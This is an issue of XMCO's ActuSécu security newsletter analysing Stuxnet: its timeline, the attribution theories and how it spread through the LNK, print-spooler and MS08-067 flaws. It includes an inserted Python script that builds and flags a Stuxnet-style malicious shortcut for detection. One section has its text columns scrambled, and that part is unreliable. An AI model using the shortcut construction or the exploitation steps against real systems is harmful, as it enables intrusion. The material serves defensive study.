ACTUSÉCU 27                                                                                      XMCO

STUXNET: ANALYSIS, MYTHS AND REALITIES

CONTENTS

Stuxnet: complete two-part article on THE virus of 2010

Keyboard Layout: analysis of the MS10-073 vulnerability used by Stuxnet

Current news: Top 10 hacking techniques, zero-day IE, GS Days 2010, ProFTPD...

Blogs, software and our favorite Tweets...

This document is the property of XMCO Partners. Any reproduction is strictly prohibited.

[1]
Are you concerned by IT security in your company?

XMCO Partners is a consultancy whose business is IT security audits.

Services:

Intrusion tests
Our experts in intrusion can test your networks, systems and web applications.
Use of OWASP, OSSTMM and CCWAPSS technologies.

Security audit
Technical and organizational audit of the security of your Information System.
Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley.

PCI DSS support
Consulting and auditing for environments requiring PCI DSS Level 1 and 2 certification.

CERT-XMCO: Vulnerability monitoring
Personalized monitoring of vulnerabilities and the fixes affecting your Information System.

CERT-XMCO: Response to intrusion
Detection and diagnosis of intrusion, collection of evidence, log examination, malware autopsy.

About XMCO Partners:

Founded in 2002 by experts in security and managed by its founders, we work in the form of fixed-fee projects with a commitment to achieve results. Intrusion tests, security audits and vulnerability monitoring are the major areas in which our firm is developing.

At the same time, we work with senior management on assignments providing support to heads of information-systems security, in drawing up master plans and in working on awareness-raising seminars with several large French accounts.

To contact XMCO Partners and discover our services: http://www.xmco.fr
WWW.XMCO.FR

[2]
FEB. 2011                                    EDITORIAL                                    NUMBER 27

We wish you a happy 2011…

This is the first issue of ActuSécu in 2011. As usual, a very busy year end made us a little late in writing this issue.

The XMCO team is strengthened with the arrival of Florent Hochwelker, a security consultant coming from SkyRecon. The security of the Windows kernel, DEP bypass and other tricks for happily causing memory overflows no longer hold any secrets for him. Florent has also written his first article in this issue.

What will 2011 bring us in terms of attacks and security? Without wishing to gaze into a crystal ball, it is clear, for me, that 2011 will be the year of m-payment: contactless mobile payments (by NFC or GSM). Although these technologies are, a priori, new, they are based on existing and proven frameworks. There will certainly be implementation errors that may be exploited by pirates, especially as these are particularly ingenious concerning hacking means of payment.

We hope that you find this issue interesting and we look forward to seeing you at Black Hat Barcelona, for which XMCO is a partner.

Frédéric Charpentier
Chief Technology Officer

ACTUSECU

Editor in chief:
Adrien GUINAULT

Contributors:
Charles DAGOUAT
Florent HOCHWELKER
Stéphane JIN
François LEGUE
Frédéric CHARPENTIER
Yannick HAMON

CONTACT XMCO
actu_secu@xmco.fr
info@xmco.fr

THE XMCO AGENDA

PCI DSS QSA TRAINING
7 and 8 March in London

BLACKHAT EUROPE
16 and 17 March in Barcelona

[3]
CONTENTS

Stuxnet Part I: analysis, myths and realities ............... 5
An examination of THE virus of 2010

Stuxnet Part II: technical analysis ........................ 13
Propagation, infection and attacks on industrial systems.

Keyboard Layout vulnerability .............................. 29
Analysis of the "elevation of privileges" vulnerability used by Stuxnet (MS10-073).

Current news ............................................... 38
Top Ten hacking techniques, zero-day IE, GS Days, ProFTPD...

Blogs, software and extensions ............................. 52
IMA, VMware compliance checker, Twitter and the rn_101 blog.

XMCO 2011

[4]
STUXNET PART I: HISTORY, MYTHS AND REALITIES

Stuxnet, elected malware of the year

It would have been inconceivable not to devote an article to THE malware of the year 2010.

Although nearly everything has already been said on this subject, we could not resist wanting to write an article on Stuxnet several months after the media buzz has subsided.

Much is still obscure concerning this malware, its origins and its developers.

However, we will try to give a summary, also taking an objective view in relation to various papers covering the subject.

If there is one thing to remember about 2010, it is surely the case of Stuxnet. This is because this malware, specifically produced to carry out the second highly-publicized targeted attack of 2010 (after Aurora), caused comment for more than six months! This article is intended as a summary of this long period, which was punctuated by many new developments. It covers the development of the discoveries and announcements that took place during this period and tries to analyze all the facts in order to draw conclusions. Between reminders on technical matters, genuine rumors and false realities, this article will appraise the situation as completely as possible.

Preliminary reminders

Stuxnet is a complex piece of malware constructed from many items, intended to sabotage the normal functioning of certain critical systems. In contrast to the somewhat indiscreet approach which is used to access these sensitive systems, this sabotage is intended to be very discreet.

To approach its target, Stuxnet exploits at least four zero-day vulnerabilities (currently all corrected by Microsoft) targeting different versions of Windows, as well as the famous MS08-067 vulnerability that was corrected several years ago.

To quickly reach its target, the malware also uses a password defined by default within certain SCADA (Supervisory Control And Data Acquisition) systems. This is based on the Siemens SIMATIC WinCC software.

Thanks to all the work performed by various researchers with an interest in malware, the role of Stuxnet has been clarified. The malicious code acts in several stages: firstly, a removable item of storage media is used to compromise a system on a local network. Once present on a network, the malware replicates, moving towards the discovery of a point of access to its target: a system on which WinCC is installed.

Secondly, when such a target is discovered, the behavior of the various items controlling the target architecture is modified in order to physically impair the integrity of the industrial production system. In the case of Stuxnet, this concerns modifying the normal function of certain critical systems by manipulating their controllers.

[5]
History

It is difficult to create a comprehensive history of the events relative to Stuxnet because of the numerous new developments and announcements during this long period. Limiting ourselves to the dates of the discoveries made and publicized by the researchers would not really make sense. It is necessary to consider the period before the media took an interest in this subject, as this attack is so complex. We are therefore going to try, with hindsight, to trace a history that takes into account the dates before the beginning of the media interest in this sabotage campaign. Also, all this takes into account discoveries made after this attack attracted media interest.

From Stuxnet

Everything officially began on 17 June 2010, when the Belarusian company Virusblokada published a report on the virus RootkitTmphider, mentioning the LNK security vulnerability. This vulnerability, which was zero-day in June 2010, allows a pirate to execute code when opening a directory, whether it is shared (SMB, WebDAV), local or on a mass-storage peripheral (external hard disk, USB drive, portable telephone, MP3 player, etc.). The vulnerability gradually began to arouse comment. MITRE dedicated reference CVE-2010-2568 to it the following 30 June, and on 13 July, Symantec added the detection of this virus under the name of W32.Temphid.

The next day, on 14 July, MITRE assigned references CVE-2010-2729 and CVE-2010-2743 to security vulnerabilities present in the print spooler and in the keyboard management. Two days afterwards, on 16 July, Microsoft published a security alert referenced KB2286198. This last concerned the security vulnerability exploited by the malware. The management of LNK files was then clearly identified as problematic by the software publisher. At the same time, VeriSign revoked the certificate belonging to Realtek Semiconductor Corp. This was because it had been used by pirates to sign certain drivers used by their malware. Symantec subsequently revealed that the first malware, which had a driver signed by the certificate and which was identified as coming from the Stuxnet family, went back to January 2010.

On 17 July, the antivirus publisher ESET detected new malware coming from the Stuxnet family. This used a certificate belonging to JMicron Technology Corp. to sign one of its components. On 19 July, a year after ivanlef0u had published a proof of concept, the researcher HD Moore published exploitation code within the Metasploit framework. This allowed control of a system to be taken over remotely by exploiting the security vulnerability through WebDAV sharing. This code allowed a pirate simply to encourage an Internet user to visit a web page with Internet Explorer to take control of the underlying system. The same day Symantec renamed W32.Temphid to W32.Stuxnet, and Siemens reported that the company was in the process of studying reports referring to the compromise of several SCADA systems linked to WinCC.

On 20 July, Symantec announced that it had discovered how the malware communicated with its command and control (C&C) servers, and the meaning of the exchanged messages.

On 21 July, MITRE assigned reference CVE-2010-2772 to the security vulnerability present within the Simatic WinCC and PCS 7 software from Siemens. A password had been hard-coded and could be used to access certain components of Siemens applications with elevated privileges.

Two days afterwards, on 23 July, VeriSign revoked the certificate belonging to JMicron Technology Corp.

Then several days passed, during which the researchers and specialists involved in this study certainly did not stop working. On 2 August, outside its "Patch Tuesday" cycle, Microsoft published its security bulletin MS10-046 proposing several patches for the LNK vulnerability. On 6 August, Symantec presented the method used by Stuxnet to inject and hide code on a PLC (Programmable Logic Controller).

On 14 September, Microsoft published a new security bulletin (MS10-061) and offered a patch for the security vulnerability present within the print spooler that was discovered by Symantec in August. The same day, MITRE assigned reference CVE-2010-3338 to the "elevation of privileges" vulnerability that was identified within the task scheduler.

Just several days afterwards, on 17 September, Joshua J. Drake (jduck1337) published exploitation code within the Metasploit framework. This allowed control to be taken of a system via the security

[6]
vulnerability present within the Windows print spooler. Lastly, to end the month of September, the publishers of the antivirus solutions ESET and Symantec published a first version of their report, on 30 September, presenting their almost-complete analyses of the malware. In fact, both publishers did not wish to disclose information on vulnerabilities that had not yet been corrected by Microsoft.

The following month, on 20 November, Joshua J. Drake published new exploitation code within the Metasploit framework to exploit the vulnerability present within the Windows task scheduler.

Finally, to prevent the exploitation of the last security vulnerability exploited by Stuxnet, Microsoft, on its "Patch Tuesday" of 12 October, published its security bulletin MS10-073 that gave a patch for the vulnerability related to the management of the keyboard. Then, after two months of waiting, in its "Patch Tuesday" of 14 December, Microsoft published its security bulletin MS10-092 offering a patch to correct the security vulnerability related to the task scheduler.

The progress made by Ralph Langner

Thanks to the work done by the German researcher Ralph Langner, which began as soon as the media began to take an interest in the malware, it has been possible to identify numerous trails related to the origin of Stuxnet, to its potential targets and to the people who are hiding behind this attack. Of course, all information published by this former psychologist should be treated with caution. Even so, it appears, with hindsight, that many opinions that he gave have been subsequently validated by other researchers (such as Symantec) or by documents coming from third-party sources.

On 16 September, Langner announced that Iran, and particularly the nuclear power station at Bushehr, which was built in cooperation with Russia, was the main target. The researcher was also the first to speak of cyber war. On each following day, he published new hypotheses and new discoveries. The researcher approached numerous entities, such as Congress, the DHS and the INL in the United States, and also appeared on television. On 13 November, Langner announced, just after Symantec, that he had come to the same conclusions concerning the malicious code 315 and the PLCs targeted. He took advantage of this to present the K-1000-60/3000-3 steam turbines manufactured by the Russian manufacturer "Power Machines" which, according to him, equipped the Bushehr nuclear plant. The following day, he presented his analysis concerning the entity that probably ordered this attack: for him, only a government could have been involved in such a scenario: the complexity of the knowledge that was necessary, the human and material resources necessary and lastly, the cost of such an organization make certain countries ideal suspects. Among the list chosen by the researcher were Israel, the United States, Germany and Russia.

On 15 November, Langner presented a technical solution allowing the malicious code 315 to destroy gas centrifuges. He was then supported by the nuclear specialist from ISIS (Institute for Science and International Security), David Albright. On the same day, a second announcement gave the details of the attack performed by the code 417. In the days that followed, numerous details of this second attack were presented and a hypothesis concerning the targets was given: according to the researcher, the code 315 targeted the IR-1 centrifuges present in the Natanz enrichment centre, while module 417 targeted the steam turbines in the electrical power station at Bushehr. A single weapon, malware, which contained two payloads: the code modules 315 and 417, targeting different PLCs.

At the end of November, the former psychologist announced that Iran and Venezuela had concluded an agreement in 2008. This alliance allowed Iran to install ballistic missiles on Venezuelan territory in exchange for

[7]
the help provided by Iran in setting up a nuclear program in the host country. A situation in which the United States would surely not be delighted to find itself; and therefore, in his opinion, a justification for the establishment of this secret program.

At the end of December, helped by the publication of the report from ISIS, which gave an analysis of the nuclear infrastructure situation reported by the inspectors from the International Atomic Energy Agency (IAEA), Langner announced that he had discovered the precise target of the malware, and more precisely, of block 417. This was the safety system associated with cascades of centrifuges used to enrich uranium. In his opinion, the PLCs targeted were used every two years in the functioning of an enrichment centre such as Natanz.

At the beginning of January, the researcher presented a new hypothesis on the role of blocks 315 and 417. According to him, their main objective was not the destruction of the centrifuges, but rather to make these production systems massively inefficient. By analyzing the data embedded in the code, and theoretical calculations on the yield of uranium production, the researcher discovered that the operations performed by the two blocks of code would drastically reduce the yield of the centrifuges.

To summarize, over the course of these few months, Langner was probably the researcher who communicated most concerning Stuxnet.

The "New York Times" theory

For the first time since the beginning of this scenario, an article published by the New York Times on 16 January described a plausible scenario. Even though this scenario is based more on a correlation between events and facts, rather than on tangible proof, these authors have the distinction of being among the first to officially name the various protagonists. It should therefore be taken with caution and is the responsibility only of the journalists who wrote the New York Times article.

In this scenario, the United States set up a plan to hinder Iran in its quest to produce nuclear weapons. According to the journalists, President Bush gave his agreement, one month before the end of his term of office in January 2009, to the establishment of a secret program aiming to sabotage the electrical and computer systems at the main uranium enrichment centre at Natanz. From the beginning of his term of office, Barack Obama, who had been informed of this before taking office, accelerated this program on the advice of those knowledgeable concerning the case of Iran.

Still according to the New York Times journalists, this program was based on work performed at the Idaho National Laboratory (INL) in partnership with the Department of Homeland Security (DHS) and Siemens. During 2008, they claim that Siemens requested the INL to test the security of its Step7 software used to control a set of industrial systems (tools, probes, etc.), using controllers such as PCS7 (Process Control System 7). The results obtained, including numerous security vulnerabilities, were presented in July at a conference that was held in Chicago.

Several months later, American diplomacy succeeded in establishing an embargo on certain components necessary to the correct functioning of a uranium enrichment centre. According to a diplomatic cable

[8]
revealed by Wikileaks, in April 2009, 111 Siemens controllers necessary to controlling a uranium enrichment cascade were therefore blocked at the port of Dubai in the United Arab Emirates.

At the end of 2010, the Institute for Science and International Security (ISIS) reported that 984 defective controllers had been replaced at the end of 2009 according to a report by inspectors from the IAEA. Strangely, this figure exactly corresponds to the number of Siemens controllers contained within an enrichment cascade. Nevertheless, what is the relationship between these 984 defective controllers and Stuxnet? These controllers were replaced between the end of 2009 and the beginning of 2010, while Stuxnet made its first public appearance at the beginning of 2010 although it was not yet identified.

The article presents Israel as a principal ally of the United States in manufacturing and testing this malware. This "small" country, which is highly advanced technologically, and particularly in cyber-warfare, is alleged to have built a replica of the Natanz enrichment centre in its own nuclear research centre: Dimona. The journalists gave two reasons for this alliance. Among the Americans' other allies, none of them would be able to make the IR-1 centrifuges work properly. These were derived from the Pakistani P-1, which themselves were copied from plans of the German G-1 stolen by the doctor of physics Abdul Qadeer Khan (father of the Pakistani nuclear bomb and in charge of a network specialized in the sale of nuclear material that helped to spread sensitive technology to Iran, North Korea and Libya). The second reason was that Israel had long been openly seeking to prevent Iran from obtaining nuclear weapons.

Israel of having ordered these assassinations. After this second suspect event, the Iranians took the decision to "hide" Mohsen Fakrizadeh, the third (and last?) nuclear specialist.

Forbes's counter theory

Another article published by journalists at Forbes the following day strongly criticized this analysis. According to them, this was based on no tangible proof. Only gestures made by certain diplomats at press conferences and the content of several diplomatic cables revealed by Wikileaks gave any support to the
                                                              journalists' article.
produce nuclear weapons. ”
                                                              The journalists took advantage of trashing this theory to
According to the authors of this article, other information   push their own analysis that was published in
revealed the magnitude of this American program.              December. According to them, the "real" powers behind
Massoud Ali Mohammadi, an Iranian nuclear                     Stuxnet were Finland and China. The reasoning behind
specialist, was killed in January 2010 by an explosion        this was that Vacon, the Finnish manufacturer of
                                                                                                                            WWW.XMCO.FR




caused by a remotely-triggered bomb fixed to a                 frequency converters (variable frequency drives) had
motorbike. On 29 November 2010, when Iran                     a manufacturing plant in China. This would mean that
recognized for the first time that Natanz had suffered         China would know precisely which PLCs to target.
damage related to Stuxnet, a second physicist, Majid          Furthermore, China is suspected to have access to part
Shahriari, was the victim of a second fatal "accident".       of the source code of Windows, which could explain the
On both of these occasions, president Mahmoud                 discovery and use of four zero-day vulnerabilities.
Ahmadinejad directly accused the United States and



Numerous other details relating to China and Finland were also revealed by the journalists to support their theory. For example, RealTek Semiconductor, the Taiwanese company whose certificate was stolen to sign the drivers, has an establishment in the industrial zone of Suzhou, in China, not far from Vacon. Finally, China was relatively untouched by the worm.

Lastly, very many international experts criticized the quality of the code in the malware. Several commentators criticized the amateurism of certain functionalities of Stuxnet: the very basic component that communicates with the C&C servers (for example, no encryption of communications, the lack of robustness of the control servers, etc.), the absence of additional protection (polymorphism, anti-debug and robust encryption), and finally an indiscreet means of proliferation that is unworthy of an attack carried out discreetly by the military. According to these commentators, these observations alone are evidence that no government is hiding behind Stuxnet.

The other factors to be remembered

On 9 July, the Indian satellite INSAT-4B was declared inoperable. This satellite, which was used for transmitting telecommunications, television broadcasting, meteorology and for individual search and rescue, was controlled by a SCADA system based on Siemens S7-400 and SIMATIC WinCC PLCs. This announcement occurred during a complex period in relations between India and China, because both countries are fiercely competing with each other in the aerospace sector to be the first Asian country to put a man on the moon.

Although Symantec and other anti-virus vendors named Iran as the main victim of Stuxnet, it was not before mid-October that the subject of Stuxnet was publicly mentioned by Iran. During this first speech, the Iranian president simply denied the damage that the worm was supposed to have caused to national infrastructure. A month later, in November, the country recognized for the first time that it had suffered "slight" problems leading to the postponement of the launch of the Bushehr plant. In reaction to this attack, the government arrested some Russian service contractors suspected of being spies. These were subsequently released.

Since the beginning of 2011, numerous other events have been added to this story. Symantec, by recovering samples obtained from the various anti-virus vendors on the market, was able to make a statistical study of the attacks. So, thanks to the 3,280 samples recovered from ESET, F-Secure, Kaspersky, Microsoft, McAfee and Trend Micro, Symantec was able to draw the following conclusions:
- exactly five organizations were targeted;
- these five organizations are all present in Iran;
- most of the 12,000 infections corresponding to the 3,280 samples can be traced to these various organizations;
- among the victims used as vectors for propagation, three were attacked once, one was targeted twice and the last one was attacked three times;
- these attacks took place at very precise dates: in June 2009, one month later in July 2009, then at three further stages in March, April and May 2010;
- lastly, three variants of the malware, corresponding to the attacks that took place in June 2009, April 2010 and May 2010, were observed. The existence of a fourth variant is assumed but has not been observed among the samples obtained.

According to Symantec, these five companies are suppliers with links to the Natanz enrichment centre.

From these samples Symantec was able to produce graphs representing the proliferation of the malware. For this, the researchers used the information recorded (date and time, for example) by the malware when it infects a new system. These graphs clearly highlight the five dates corresponding to the attacks and the number of targets initially contaminated during each of these events.

The day after this announcement, several media echoed another announcement that was particularly surprising. During a video shown at a party given in honor of the retirement of General Gabi Ashkenazi, and published by the conservative newspaper Haaretz, it was claimed that the newly-retired general had supervised the creation of Stuxnet. Nevertheless, as no official Israeli source has corroborated this announcement, it must be taken with caution.

The warning signs

The Stuxnet affair began well before 2010. Thus, Symantec was able to find traces of the malware going back to 2008. On 20 November 2008, Symantec observed the exploitation of the LNK vulnerability for the first time. This had not been analyzed at the time, and we had to wait until the appearance of Stuxnet to discover that attackers had known about this vulnerability for more than two years. The virus in question was then identified as "Trojan.Zlob" and does not appear to be related to Stuxnet.

In April 2009, the researcher Carsten Kohler published an article in the magazine Hakin9 presenting a security vulnerability within the Windows print spooler. No one reacted, not even Microsoft, which was clearly concerned! Several months later, in June 2009, Symantec detected a new malware that is now identified as the first version of Stuxnet. This was very simple and did not carry all of the payloads that we know today. According to Symantec, it was in January 2010 that the first malware in the Stuxnet family appeared using the certificate from Realtek Semiconductor Corp. to sign one of the components of the malware. Lastly, it was in March 2010 that the first malware in the Stuxnet family appeared which exploited the LNK vulnerability.

Conclusion

Stuxnet has caused a lot of comment and been highly publicized. The various theories, analyses and hypotheses made until now do not allow any conclusions to be drawn with certainty, either concerning those ordering the attacks or the targets. However, according to the various discoveries made by several researchers and journalists (Symantec, Langner and the New York Times), Iran seems to have been targeted, especially the nuclear enrichment centre at Natanz. Concerning those ordering the attack, and bearing in mind its complexity, the resources used and the different information revealed by the journalists, Israel and the USA appear to have played a role in this affair. We must also bear in mind that all of the information revealed by the various observers is always subjective…
References

Resources on Stuxnet
http://blog.eset.com/2011/01/03/stuxnet-information-and-resources

F-Secure (FAQ)
http://www.f-secure.com/weblog/archives/00002040.html
http://www.f-secure.com/weblog/archives/00002066.html

Timeline
http://www.infracritical.com/papers/stuxnet-timeline.txt

CERT-IST
http://www.cert-ist.com/fra/ressources/Publications_ArticlesBulletins/VersVirusetAntivirus/stuxnet/

New York Times
http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html?pagewanted=all
http://www.nytimes.com/2010/11/30/world/middleeast/30tehran.html?pagewanted=print
http://www.nytimes.com/2010/01/13/world/middleeast/13iran.html?_r=1&pagewanted=print

Forbes
http://blogs.forbes.com/jeffreycarr/2011/01/17/the-new-york-times-fails-to-deliver-stuxnets-creators/?boxes=Homepagechannels
http://blogs.forbes.com/firewall/2010/12/14/stuxnets-finnish-chinese-connection/
STUXNET PART II: TECHNICAL ANALYSIS

Charles Dagouat

Stuxnet, elected malware of the year

After having looked at the history of Stuxnet and the theories and assumptions behind it, let us now look at its technical analysis.

Some very good white papers (Symantec and ESET) have given a detailed presentation of the complexity of this malware.

We will try to summarize everything to give an understanding of the propagation modes used, the relationships with industrial systems and the consequences that Stuxnet may cause.

General functioning

Stuxnet is a complex piece of malware. Its functioning mode revolves around two main "functions": the propagation of the virus, which is based upon vulnerabilities in the Windows platform, and the attack on SCADA systems, which is focused on WinCC and PCS7.

This second function corresponds to the payload transported by the malware. It is based on the software component WinCC. WinCC is a very widespread tool for remote monitoring and data acquisition developed by Siemens. Installed on a Windows system, it is used to control an automated system such as a Programmable Logic Controller (PLC). This type of architecture is particularly adapted to critical infrastructure such as can be found in industry.

To fulfill its task, Stuxnet's functioning is governed by a very specific scenario. The architecture of the malware is built around several main functionalities that correspond to the different stages in the attack process. The first stage is not characteristic of Stuxnet, but corresponds to the majority of worms: it is the propagation phase. During this phase, the malware seeks to spread within a given area: the local network.

The second phase corresponds to the attack itself: this is the search for a target. In the case of Stuxnet, the target is a Siemens WinCC control and monitoring system linked to certain PLCs. If such a system is detected, its behavior is then discreetly impaired. Lastly, the final phase corresponds to the material consequence of this modification. The undetectable effect discreetly acts on the system in order to slowly destroy it.
Phase I: malware propagation

Phase 1 of the attack carried out by Stuxnet therefore corresponds to the proliferation of the malware within an installed base of computers. For this, the authors of Stuxnet used no less than four zero-day vulnerabilities targeting various components of Windows. This propagation function may itself be subdivided into several sections: the first corresponds to compromising Windows systems and the second to the long-term installation of the virus on a compromised system.

The main points of entry chosen by the developers of Stuxnet to penetrate the target infrastructure are removable storage media such as USB drives and other portable hard drives. Those behind the attack are therefore mainly relying on human intervention to carry the virus from one system to another.

Main attack vector: removable storage media

The vulnerability in question is related to how the Windows operating system manages shortcuts. This type of file corresponds to the extensions ".LNK" and ".PIF". More precisely, the vulnerability relates to the way that the icon for the link is loaded. This image is normally loaded from a CPL (Windows Control Panel) file using the system function "LoadLibraryW()". In reality, a CPL file is just a DLL. By specifying the path to a malicious DLL in the "File Location Info" section of a LNK file, an attacker is therefore able to force any Windows system to execute arbitrary code simply by displaying the content of a directory.

Exploitation of this vulnerability simply requires a user to open a malicious directory. Exploitation code has already been published within the Metasploit framework. Using this, an attacker only needs to get an Internet user to access a web address with Internet Explorer to take control of the remote system. In this proof of concept, the server forces the client to open a shared file using the WebDAV protocol.

A user observing the content of a USB drive infected by Stuxnet can see the following six files:
- Copy of Shortcut to.lnk;
- Copy of Copy of Shortcut to.lnk;
- Copy of Copy of Copy of Shortcut to.lnk;
- Copy of Copy of Copy of Copy of Shortcut to.lnk;
- ~WTR4141.TMP;
- ~WTR4132.TMP.

The various shortcuts entitled "Copy of (...) Shortcut to.lnk" correspond to different versions of Windows. These links all load the library "~WTR4141.TMP" which, in turn, loads the file "~WTR4132.TMP".

After having officially acknowledged the security vulnerability by publishing the security advisory referenced KB2286198 on 16 July, Microsoft quickly reacted by publishing its bulletin MS10-046 and the associated patches on 2 August, outside its "Patch Tuesday", which was planned for eight days later, on 10 August.
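The shortcut format discussed above, as an added example that is not part of the original article or of any vendor's tooling: a small parser for the Windows Shell Link (.lnk) layout that reads the LinkInfo block (the "File Location Info" the text refers to, which carries the local base path) and the IconLocation string, then applies defender-side triage rules. The shortcut bytes are constructed inside the script by build_lnk() so it runs offline; the path names reuse the ~WTR4141.TMP file listed above, while the triage rules, the system-path exclusion and the drive-type check are my assumptions, not Microsoft's or Symantec's logic.

```python
import re
import struct

# Shell Link header constants (MS-SHLLINK): fixed 0x4C-byte header and CLSID.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01  # LinkInfoFlags bit
DRIVE_REMOVABLE = 2                   # DriveType value inside the VolumeID block

# Icon sources Windows resolves through LoadLibraryW(): a shortcut whose icon
# "file" has one of these extensions is loaded as code, not decoded as an image.
LIBRARY_EXTENSIONS = (".cpl", ".dll", ".tmp")
# Legitimate shortcuts routinely borrow icons from shell32.dll, so paths under
# the Windows directory are excluded from the library rule (assumed heuristic).
SYSTEM_PREFIXES = ("%systemroot%", "c:\\windows\\")
COPY_OF_PATTERN = re.compile(r"(copy of )+shortcut to\.lnk", re.IGNORECASE)


def build_lnk(local_base_path, icon_location, drive_type=DRIVE_REMOVABLE):
    """Constructed sample: minimal shortcut with a LinkInfo block and an IconLocation string."""
    flags = HAS_LINK_INFO | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    # VolumeID: size, DriveType, serial number, VolumeLabelOffset, empty label.
    volume_id = struct.pack("<IIII", 0x11, drive_type, 0, 0x10) + b"\x00"
    base_path = local_base_path.encode("latin-1") + b"\x00"
    suffix = b"\x00"  # empty CommonPathSuffix
    li_header_size = 0x1C
    vol_off = li_header_size
    lbp_off = vol_off + len(volume_id)
    suffix_off = lbp_off + len(base_path)
    li_size = suffix_off + len(suffix)
    link_info = struct.pack("<IIIIIII", li_size, li_header_size,
                            VOLUME_ID_AND_LOCAL_BASE_PATH, vol_off, lbp_off,
                            0, suffix_off) + volume_id + base_path + suffix
    icon = struct.pack("<H", len(icon_location)) + icon_location.encode("utf-16-le")
    terminal = struct.pack("<I", 0)  # ExtraData TerminalBlock
    return header + link_info + icon + terminal


def _read_cstr(data, offset):
    return data[offset:data.index(b"\x00", offset)].decode("latin-1")


def parse_lnk(data):
    """Return the header flags and the path-carrying fields of a shortcut."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = HEADER_SIZE
    info = {"flags": flags, "local_base_path": None, "drive_type": None}
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip the IDList, sized by its 2-byte prefix
        (idlist_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    if flags & HAS_LINK_INFO:  # "File Location Info": where the target really lives
        li_size, _, li_flags, vol_off, lbp_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
            info["drive_type"] = struct.unpack_from("<I", data, pos + vol_off + 4)[0]
            info["local_base_path"] = _read_cstr(data, pos + lbp_off)
        pos += li_size
    # StringData blocks follow in this fixed order, each present only if flagged.
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            (count,) = struct.unpack_from("<H", data, pos)
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            info[key] = data[pos:pos + count * width].decode(
                "utf-16-le" if width == 2 else "latin-1")
            pos += count * width
    return info


def _library_outside_windows(path):
    low = path.lower()
    return low.endswith(LIBRARY_EXTENSIONS) and not low.startswith(SYSTEM_PREFIXES)


def assess_lnk(filename, data):
    """Defender-side triage: reasons a shortcut resembles the USB vector described above."""
    info = parse_lnk(data)
    findings = []
    for key in ("local_base_path", "icon_location"):
        path = info.get(key)
        if path and _library_outside_windows(path):
            findings.append(f"{key} points at a library-like file: {path}")
    if info["drive_type"] == DRIVE_REMOVABLE:
        findings.append("target resides on removable media")
    if COPY_OF_PATTERN.fullmatch(filename):
        findings.append("file name follows the 'Copy of ... Shortcut to.lnk' pattern")
    return findings


if __name__ == "__main__":
    sample = build_lnk(r"E:\~WTR4141.tmp", r"E:\~WTR4141.tmp")
    for finding in assess_lnk("Copy of Copy of Shortcut to.lnk", sample):
        print("-", finding)
```

The real Stuxnet shortcuts placed the control-panel item inside the IDList rather than in plain string fields, so a production triage tool must also walk the IDList; the rules here show the shape of the check, not a complete signature.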
Additional attack vectors: local network

However, Stuxnet does not only rely on help from users to spread. It also uses two other security flaws that can be remotely exploited within a local network. The first relates to the Microsoft print spooler, while the second targets the old vulnerability present within the Server service (MS08-067).

Print spooler

This security vulnerability was initially presented in the magazine Hakin9 during 2009. When a printer is shared on a system, a user is able to "print" (read and write) files in the "%System%" directory. Exploitation of this security vulnerability takes place in two phases. The first consists of depositing the files "winsta.exe" and "sysnullevnt.mof" respectively in the directories "Windows\System32" and "Windows\System32\wbem\mof".

The second phase in exploiting this vulnerability consists of executing the script "sysnullevnt.mof". This file, in MOF ("Managed Object Format"), is used to force Windows to execute the code contained in the file "winsta.exe". Execution of this script is automatic. This is because the MOF files placed in the directory "Windows\System32\wbem\mof" are automatically compiled by "mofcomp.exe" to register the WMI context that triggers the execution of the script.

This security vulnerability was corrected by Microsoft when it published its bulletin MS10-061, which added a series of checks before allowing a document to be printed.

Server service

Lastly, Stuxnet exploits the old MS08-067 security vulnerability in the Server service. This vulnerability, which at the time was massively exploited by Conficker/Downadup, is used here to deposit a file in shared directories of the C$ or Admin$ type. The execution of this file is scheduled for the day following compromise, using the task scheduler. It appears that the shellcode used by the malware to carry out these two actions is relatively advanced, in contrast to that used by Conficker.

This security vulnerability was corrected by Microsoft when it published bulletin MS08-067.

The exploitation of these various security vulnerabilities allows the malware to distribute itself both on a local network and, more widely, on all systems to which users can connect removable storage media. Once installed on a Windows system, the malware has several functionalities that allow it to work as part of a network. Among these, the malware installs an RPC server that allows it to exchange various items of information with other infected systems present on the LAN.

INFO
Provision of free tools for getting rid of malware, including Stuxnet.

BitDefender and Microsoft have just made free tools available for getting rid of the most currently fashionable malware.

After publishing a tool last month for getting rid of Zeus (see CXA-2010-1211), BitDefender has just published another tool for deleting the Stuxnet malware. As a reminder, the malware was detected for the first time by a company based in Belarus (see CXA-2010-0893), following the discovery of the zero-day LNK security vulnerability affecting all versions of Windows (see CXA-2010-0906).

Microsoft has just updated its "Malicious Software Removal Tool", which can now deal with the most virulent botnet that is currently known: Zeus/ZBot. Zeus is malware that is constantly being developed, and which mainly aims to steal banking information.

The two tools can be downloaded via the following links:

Stuxnet:
http://www.malwarecity.com/community/index.php?app=downloads&showfile=12

Zbot:
http://blogs.technet.com/b/mmpc/archive/2010/10/12/msrt-on-zbot-the-botnet-in-a-box.aspx
